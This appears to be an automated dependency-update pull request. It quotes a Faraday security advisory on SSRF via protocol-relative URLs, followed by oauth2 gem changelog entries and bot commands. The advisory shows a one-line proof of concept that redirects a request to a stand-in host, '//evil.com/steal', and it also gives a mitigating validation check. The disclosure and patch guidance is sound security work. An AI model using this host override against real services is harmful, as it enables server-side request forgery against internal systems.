🚨 Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url

Impact

Faraday's build_exclusive_url method (in lib/faraday/connection.rb) uses Ruby's
URI#merge to combine the connection's base URL with a user-supplied path. Per RFC 3986,
protocol-relative URLs (e.g. //evil.com/path) are treated as network-path references
that override the base URL's host/authority component.

This means that if any application passes user-controlled input to Faraday's get(),
post(), build_url(), or other request methods, an attacker can supply a
protocol-relative URL like //attacker.com/endpoint to redirect the request to an
arbitrary host, enabling Server-Side Request Forgery (SSRF).

The ./ prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with
/, so protocol-relative URLs bypass it entirely.

Example:

conn = Faraday.new(url: 'https://api.internal.com')
conn.get('//evil.com/steal')
# Request is sent to https://evil.com/steal instead of api.internal.com

Patches

Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected.

Workarounds

NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.

Applications should validate and sanitize any user-controlled input before passing it to
Faraday request methods. Specifically:

• Reject or strip input that starts with // followed by a non-/ character
• Use an allowlist of permitted path prefixes
• Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday

Example validation:

def safe_path(user_input)
  raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]})
  user_input
end

Too many releases to show here. View the full release notes.

See the full diff on Github. The new version differs by more commits than we can show here.

1.4.10 (from changelog)

• FIPS Compatibility #587 (@akostadinov)

1.4.9 (from changelog)

• Fixes compatibility with Faraday v2 572
• Includes supported versions of Faraday in test matrix:
  • Faraday ~> 2.2.0 with Ruby >= 2.6
  • Faraday ~> 1.10 with Ruby >= 2.4
  • Faraday ~> 0.17.3 with Ruby >= 1.9
• Add Windows and MacOS to test matrix

1.4.8 (from changelog)

• MFA is now required to push new gem versions (@pboling)
• README overhaul w/ new Ruby Verion and Engine compatibility policies (@pboling)
• #569 Backport fixes (#561 by @ryogift), and add more fixes, to allow faraday 1.x and 2.x (@jrochkind)
• Improve Code Coverage tracking (Coveralls, CodeCov, CodeClimate), and enable branch coverage (@pboling)
• Add CodeQL, Security Policy, Funding info (@pboling)
• Added Ruby 3.1, jruby, jruby-head, truffleruby, truffleruby-head to build matrix (@pboling)
• #543 - Support for more modern Open SSL libraries (@pboling)

1.4.7 (from changelog)

• #541 - Backport fix to expires_at handling #533 to 1-4-stable branch. (@dobon)

1.4.6 (from changelog)

• #540 - Add VERSION constant (@pboling)
• #537 - Fix crash in OAuth2::Client#get_token (@anderscarling)
• #538 - Remove reliance on globally included OAuth2 in tests, analogous to #539 on master branch (@anderscarling)

1.4.5 (from changelog)

• #535 - Compatibility with range of supported Ruby OpenSSL versions, Rubocop updates, Github Actions, analogous to #536 on master branch (@pboling)
• #518 - Add extract_access_token option to OAuth2::Client (@jonspalmer)

1.4.4 (from changelog)

• #408 - Fixed expires_at for formatted time (@Lomey)

1.4.3 (from changelog)

• #483 - add project metadata to gemspec (@orien)
• #495 - support additional types of access token requests (@SteveyblamFreeagent, @thomcorley, @dgholz)
  • Adds support for private_key_jwt and tls_client_auth

1.4.2 (from changelog)

• #478 - support latest version of faraday & fix build (@pboling)
  • Officially support Ruby 2.6 and truffleruby

Does any of this look wrong? Please let us know.

See the full diff on Github. The new version differs by more commits than we can show here.

@​depfu rebase

Rebases against your default branch and redoes this update

@​depfu recreate

Recreates this PR, overwriting any edits that you've made to it

@​depfu merge

Merges this PR once your tests are passing and conflicts are resolved

@​depfu cancel merge

Cancels automatic merging of this PR

@​depfu close

Closes this PR and deletes the branch

@​depfu reopen

Restores the branch and reopens this PR (if it's closed)

@​depfu pause

Ignores all future updates for this dependency and closes this PR

@​depfu pause [minor|major]

Ignores all future minor/major updates for this dependency and closes this PR

@​depfu resume

Future versions of this dependency will create PRs again (leaves this PR as is)